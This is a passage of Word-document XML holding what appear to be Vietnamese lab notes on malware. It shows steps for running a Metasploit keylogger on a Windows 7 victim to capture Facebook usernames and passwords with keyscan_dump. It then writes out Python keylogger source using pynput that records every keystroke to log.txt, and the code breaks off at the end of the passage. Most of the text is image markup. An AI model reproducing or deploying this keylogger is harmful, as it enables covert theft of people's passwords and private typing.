                  <wp:extent cx="1152686" cy="257211"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
                  <wp:docPr id="122576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65073" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId20"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1152686" cy="257211"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33FA1A6D" w14:textId="77777777" w:rsidR="008B046F" w:rsidRDefault="008B046F" w:rsidP="008B046F"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4984" w14:paraId="049C5DED" w14:textId="77777777" w:rsidTr="009B4984">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7031" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23FD1A77" w14:textId="5A738E4C" w:rsidR="008B046F" w:rsidRPr="002E2F8E" w:rsidRDefault="00A81145" w:rsidP="008B046F">
            <w:r w:rsidRPr="00A81145">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E26E44F" wp14:editId="720916D1">
                  <wp:extent cx="3545541" cy="222258"/>
                  <wp:effectExtent l="0" t="0" r="0" b="6350"/>
                  <wp:docPr id="34205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59139" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId21"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3679314" cy="230644"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FED1070" w14:textId="77777777" w:rsidR="008B046F" w:rsidRDefault="008B046F" w:rsidP="008B046F"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4984" w14:paraId="3BC2147F" w14:textId="77777777" w:rsidTr="009B4984">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7031" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54FFC8A0" w14:textId="4F9B5AE2" w:rsidR="008B046F" w:rsidRPr="002E2F8E" w:rsidRDefault="00A81145" w:rsidP="008B046F">
            <w:r w:rsidRPr="00A81145">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15FA7D93" wp14:editId="45B03257">
                  <wp:extent cx="3753374" cy="266737"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="185923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34523" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId22"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3753374" cy="266737"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73C0852D" w14:textId="77777777" w:rsidR="008B046F" w:rsidRDefault="008B046F" w:rsidP="008B046F"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4984" w14:paraId="5247C8A0" w14:textId="77777777" w:rsidTr="009B4984">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7031" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F991D70" w14:textId="5F8D994B" w:rsidR="008B046F" w:rsidRPr="002E2F8E" w:rsidRDefault="00A81145" w:rsidP="008B046F">
            <w:r w:rsidRPr="00A81145">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="563EAF62" wp14:editId="711AC7B9">
                  <wp:extent cx="3635188" cy="678277"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
                  <wp:docPr id="8723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56795" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId23"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3712638" cy="692728"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="500B083C" w14:textId="786E879C" w:rsidR="008B046F" w:rsidRDefault="00A81145" w:rsidP="008B046F">
            <w:r>
              <w:t>Khúc này là phải qua WinXP</w:t>
            </w:r>
            <w:r w:rsidR="00234FD5">
              <w:t>/Win7</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> truy cập vô domain rồi bấm run chương trình mã độc thì mới kết nối được</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> như bên dưới:</w:t>
            </w:r>
            <w:r w:rsidRPr="00A81145">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F818B57" wp14:editId="71F3F4DA">
                  <wp:extent cx="2209592" cy="1104900"/>
                  <wp:effectExtent l="0" t="0" r="635" b="0"/>
                  <wp:docPr id="102874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47605" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId24"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2305066" cy="1152642"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4984" w14:paraId="2269EA1E" w14:textId="77777777" w:rsidTr="009B4984">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7031" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26E8925F" w14:textId="5565B06F" w:rsidR="008B046F" w:rsidRPr="002E2F8E" w:rsidRDefault="00113D50" w:rsidP="008B046F">
            <w:r w:rsidRPr="00113D50">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="392E6E43" wp14:editId="2F1F2C50">
                  <wp:extent cx="4327815" cy="1511300"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="71537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78696" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId25"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4355075" cy="1520819"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4343FDBC" w14:textId="37DFD5B3" w:rsidR="008B046F" w:rsidRDefault="00113D50" w:rsidP="008B046F">
            <w:r>
              <w:t>=&gt; Thích làm gì làm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5860C2B7" w14:textId="625788AE" w:rsidR="009B4984" w:rsidRDefault="009B4984" w:rsidP="00DB2752"/>
    <w:p w14:paraId="532367B5" w14:textId="77777777" w:rsidR="009B4984" w:rsidRDefault="009B4984">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4006DCF5" w14:textId="38AECA46" w:rsidR="00D80A00" w:rsidRDefault="009B4984" w:rsidP="009B4984">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Malware 3 – </w:t>
      </w:r>
      <w:r w:rsidRPr="009B4984">
        <w:t>Executing Applications Keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD4727D" w14:textId="589500C8" w:rsidR="009B4984" w:rsidRDefault="009B4984" w:rsidP="009B4984">
      <w:r>
        <w:t>Giống y chang Malware 2, chỉ điều là dùng keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384B9A1D" w14:textId="13A215C4" w:rsidR="009B4984" w:rsidRDefault="009B4984" w:rsidP="009B4984">
      <w:r>
        <w:t xml:space="preserve">Link: </w:t>
      </w:r>
      <w:r w:rsidR="00441D5C">
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidR="00441D5C" w:rsidRPr="009C165D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=S8fZpwBDkGY</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C554F4" w14:textId="5395905C" w:rsidR="00441D5C" w:rsidRDefault="00441D5C" w:rsidP="009B4984">
      <w:r>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="009C165D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://en.iguru.gr/chrisimopoiiste-keylogger-sto-metasploit-framework/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (đọc để biết cách sử dụng migrate)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5228"/>
        <w:gridCol w:w="5229"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AD3F71" w14:paraId="4096417B" w14:textId="77777777" w:rsidTr="00D57FCD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10457" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="38DE3B50" w14:textId="6CA7F3A0" w:rsidR="00AD3F71" w:rsidRDefault="00AD3F71" w:rsidP="00AD3F71">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>… (Phần trước của Malware 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD3F71" w14:paraId="2E879526" w14:textId="77777777" w:rsidTr="00AD3F71">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5228" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F5AE838" w14:textId="7E87057C" w:rsidR="00AD3F71" w:rsidRDefault="00967801" w:rsidP="00DB2752">
            <w:r w:rsidRPr="00967801">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CEA59BD" wp14:editId="073E9583">
                  <wp:extent cx="2631440" cy="402939"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="67318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86636" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId28"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2674860" cy="409588"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5229" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D8B92B2" w14:textId="0D060AD0" w:rsidR="00AD3F71" w:rsidRDefault="001D5A3B" w:rsidP="00DB2752">
            <w:r>
              <w:t>Bắt đầu keylogger</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD3F71" w14:paraId="1A8642B2" w14:textId="77777777" w:rsidTr="00AD3F71">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5228" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2271AE85" w14:textId="6308403E" w:rsidR="00AD3F71" w:rsidRDefault="001D5A3B" w:rsidP="00DB2752">
            <w:r w:rsidRPr="001D5A3B">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E956423" wp14:editId="0D47404B">
                  <wp:extent cx="2821646" cy="685800"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="78354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49621" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId29"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2827472" cy="687216"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5229" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E40E460" w14:textId="104ED954" w:rsidR="00AD3F71" w:rsidRDefault="001D5A3B" w:rsidP="00DB2752">
            <w:r>
              <w:t>Qua bên win</w:t>
            </w:r>
            <w:r w:rsidR="00234FD5">
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> truy cập facebook</w:t>
            </w:r>
            <w:r w:rsidR="00234FD5">
              <w:t xml:space="preserve"> = firefox</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> rồi gõ username &amp;&amp; password</w:t>
            </w:r>
            <w:r w:rsidR="00234FD5">
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> xong keyscan_dump sẽ hiện ra các lịch sử gõ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="01594D66" w14:textId="264DCA3F" w:rsidR="00C27EDA" w:rsidRDefault="00C27EDA" w:rsidP="00DB2752"/>
    <w:p w14:paraId="11549666" w14:textId="77777777" w:rsidR="00C27EDA" w:rsidRDefault="00C27EDA">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6220FB19" w14:textId="36795C63" w:rsidR="00B00EEB" w:rsidRDefault="00C27EDA" w:rsidP="00C27EDA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Malware 4 – </w:t>
      </w:r>
      <w:r w:rsidRPr="00C27EDA">
        <w:t>Coding Keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74826B15" w14:textId="2E73E8FA" w:rsidR="00C27EDA" w:rsidRDefault="00C27EDA" w:rsidP="00C27EDA">
      <w:r>
        <w:t xml:space="preserve">Link Video: </w:t>
      </w:r>
      <w:r w:rsidR="00957EC1">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004627A5">
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidR="004627A5" w:rsidRPr="000C6304">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=Z0Jfcv29Cy8</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004C4EBF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00957EC1">
        <w:t>(keylogger)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B475193" w14:textId="4D214E1C" w:rsidR="00E75DBF" w:rsidRDefault="00E75DBF" w:rsidP="00957EC1">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(2) </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="000C6304">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=ytvKVYYrqEw</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (dấu file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BA5332" w14:textId="77777777" w:rsidR="004C4EBF" w:rsidRDefault="004C4EBF" w:rsidP="00C27EDA">
      <w:r>
        <w:t>Computer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADE63AF" w14:textId="75C83FCF" w:rsidR="00C27EDA" w:rsidRDefault="004C4EBF" w:rsidP="004C4EBF">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">|_ </w:t>
      </w:r>
      <w:r w:rsidR="00F516D6">
        <w:t>Dùng máy thật</w:t>
      </w:r>
      <w:r w:rsidR="00C27EDA">
        <w:t>: Tạo code keylogger</w:t>
      </w:r>
      <w:r w:rsidR="00CA7259">
        <w:t xml:space="preserve"> ở đĩa D:\A (thư mục A tự tạo thêm)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290B5636" w14:textId="23586C39" w:rsidR="00C27EDA" w:rsidRDefault="004C4EBF" w:rsidP="004C4EBF">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">|_ </w:t>
      </w:r>
      <w:r w:rsidR="00F516D6">
        <w:t>XXX</w:t>
      </w:r>
      <w:r w:rsidR="00C27EDA">
        <w:t>: Nạn nhân</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6941"/>
        <w:gridCol w:w="3516"/>
      </w:tblGrid>
      <w:tr w:rsidR="007643DE" w14:paraId="38613A78" w14:textId="77777777" w:rsidTr="00BB4A52">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10457" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="697E9684" w14:textId="6375A841" w:rsidR="007643DE" w:rsidRPr="007643DE" w:rsidRDefault="007643DE" w:rsidP="007643DE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007643DE">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Tạo keylogger</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D16781" w14:paraId="3E150D7C" w14:textId="77777777" w:rsidTr="005E5CFB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6941" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CF24D8F" w14:textId="0753B65A" w:rsidR="00A20851" w:rsidRDefault="00FE3DC1" w:rsidP="004C4EBF">
            <w:r w:rsidRPr="00FE3DC1">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31874CC0" wp14:editId="79057AF5">
                  <wp:extent cx="2509157" cy="1558795"/>
                  <wp:effectExtent l="0" t="0" r="5715" b="3810"/>
                  <wp:docPr id="102103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33853" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId32"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2522963" cy="1567372"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36964655" w14:textId="05AC2DE0" w:rsidR="00A35F50" w:rsidRDefault="00FE3DC1" w:rsidP="004C4EBF">
            <w:r>
              <w:t>Cài thư viện pynput</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D16781" w14:paraId="7DCEBAEA" w14:textId="77777777" w:rsidTr="005E5CFB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6941" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A2A455A" w14:textId="245448D7" w:rsidR="007375CB" w:rsidRPr="007375CB" w:rsidRDefault="007375CB" w:rsidP="007375CB">
            <w:r w:rsidRPr="007375CB">
              <w:t>from pynput.keyboard import Listener</w:t>
            </w:r>
            <w:r w:rsidR="005E5CFB">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005E5CFB" w:rsidRPr="005E5CFB">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>(1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42B384AE" w14:textId="77777777" w:rsidR="007375CB" w:rsidRPr="007375CB" w:rsidRDefault="007375CB" w:rsidP="007375CB"/>
          <w:p w14:paraId="7BF5F221" w14:textId="368FF82C" w:rsidR="007375CB" w:rsidRPr="007375CB" w:rsidRDefault="007375CB" w:rsidP="007375CB">
            <w:r w:rsidRPr="007375CB">
              <w:t>def anonymous(key):</w:t>
            </w:r>
            <w:r w:rsidR="005E5CFB">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005E5CFB" w:rsidRPr="005E5CFB">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>(2)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2556E3E9" w14:textId="77777777" w:rsidR="007375CB" w:rsidRPr="007375CB" w:rsidRDefault="007375CB" w:rsidP="007375CB">
            <w:r w:rsidRPr="007375CB">
              <w:t>    key = str(key)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1172284E" w14:textId="5B933DC6" w:rsidR="007375CB" w:rsidRPr="007375CB" w:rsidRDefault="007375CB" w:rsidP="007375CB">
            <w:r w:rsidRPr="007375CB">
              <w:t>    key = key.replace("'","")</w:t>
            </w:r>
            <w:r w:rsidR="005E5CFB">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005E5CFB" w:rsidRPr="00CE6BD2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>//loại bỏ dấu nháy đơn</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6380F6D3" w14:textId="77777777" w:rsidR="007375CB" w:rsidRPr="007375CB" w:rsidRDefault="007375CB" w:rsidP="007375CB">
            <w:r w:rsidRPr="007375CB">
              <w:t>    if key == "Key.f12":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6589E939" w14:textId="5FDDC60F" w:rsidR="007375CB" w:rsidRPr="007375CB" w:rsidRDefault="007375CB" w:rsidP="007375CB">
            <w:r w:rsidRPr="007375CB">
              <w:t>        raise SystemExit(0)</w:t>
            </w:r>
            <w:r w:rsidR="005E5CFB">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005E5CFB" w:rsidRPr="00CE6BD2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>//thoát chương trình</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76C5111C" w14:textId="77777777" w:rsidR="007375CB" w:rsidRPr="007375CB" w:rsidRDefault="007375CB" w:rsidP="007375CB">
            <w:r w:rsidRPr="007375CB">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="012E6479" w14:textId="77777777" w:rsidR="007375CB" w:rsidRPr="007375CB" w:rsidRDefault="007375CB" w:rsidP="007375CB">
            <w:r w:rsidRPr="007375CB">
              <w:t>    if key == "Key.ctrl_l":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BD12ED3" w14:textId="77777777" w:rsidR="007375CB" w:rsidRPr="007375CB" w:rsidRDefault="007375CB" w:rsidP="007375CB">
            <w:r w:rsidRPr="007375CB">
              <w:t>        key == ""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52FE4FAF" w14:textId="77777777" w:rsidR="007375CB" w:rsidRPr="007375CB" w:rsidRDefault="007375CB" w:rsidP="007375CB"/>
          <w:p w14:paraId="0143DBB2" w14:textId="77777777" w:rsidR="007375CB" w:rsidRPr="007375CB" w:rsidRDefault="007375CB" w:rsidP="007375CB">
            <w:r w:rsidRPr="007375CB">
              <w:t>    if key == "Key.enter":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="234FFD74" w14:textId="77777777" w:rsidR="007375CB" w:rsidRPr="007375CB" w:rsidRDefault="007375CB" w:rsidP="007375CB">
            <w:r w:rsidRPr="007375CB">
              <w:t>        key == "\n"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EBB110D" w14:textId="77777777" w:rsidR="007375CB" w:rsidRPr="007375CB" w:rsidRDefault="007375CB" w:rsidP="007375CB"/>
          <w:p w14:paraId="7989F0C1" w14:textId="7FDFDC98" w:rsidR="007375CB" w:rsidRPr="007375CB" w:rsidRDefault="007375CB" w:rsidP="007375CB">
            <w:r w:rsidRPr="007375CB">
              <w:t>    with open("log.txt", "a") as file:</w:t>
            </w:r>
            <w:r w:rsidR="005E5CFB">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005E5CFB" w:rsidRPr="005E5CFB">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>(3)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BE61A25" w14:textId="77777777" w:rsidR="007375CB" w:rsidRPr="007375CB" w:rsidRDefault="007375CB" w:rsidP="007375CB">
            <w:r w:rsidRPr="007375CB">
              <w:t>        file.write(key)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0585C500" w14:textId="77777777" w:rsidR="007375CB" w:rsidRPr="007375CB" w:rsidRDefault="007375CB" w:rsidP="007375CB">
            <w:r w:rsidRPr="007375CB">
              <w:t>    print(key)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77E35661" w14:textId="77777777" w:rsidR="007375CB" w:rsidRPr="007375CB" w:rsidRDefault="007375CB" w:rsidP="007375CB"/>
          <w:p w14:paraId="6775CF15" w14:textId="22052D7D" w:rsidR="007375CB" w:rsidRPr="007375CB" w:rsidRDefault="007375CB" w:rsidP="007375CB">
            <w:r w:rsidRPr="007375CB">
              <w:t>with Listener(on_press=anonymous) as hacker:</w:t>
            </w:r>
            <w:r w:rsidR="005E5CFB">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005E5CFB" w:rsidRPr="005E5CFB">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
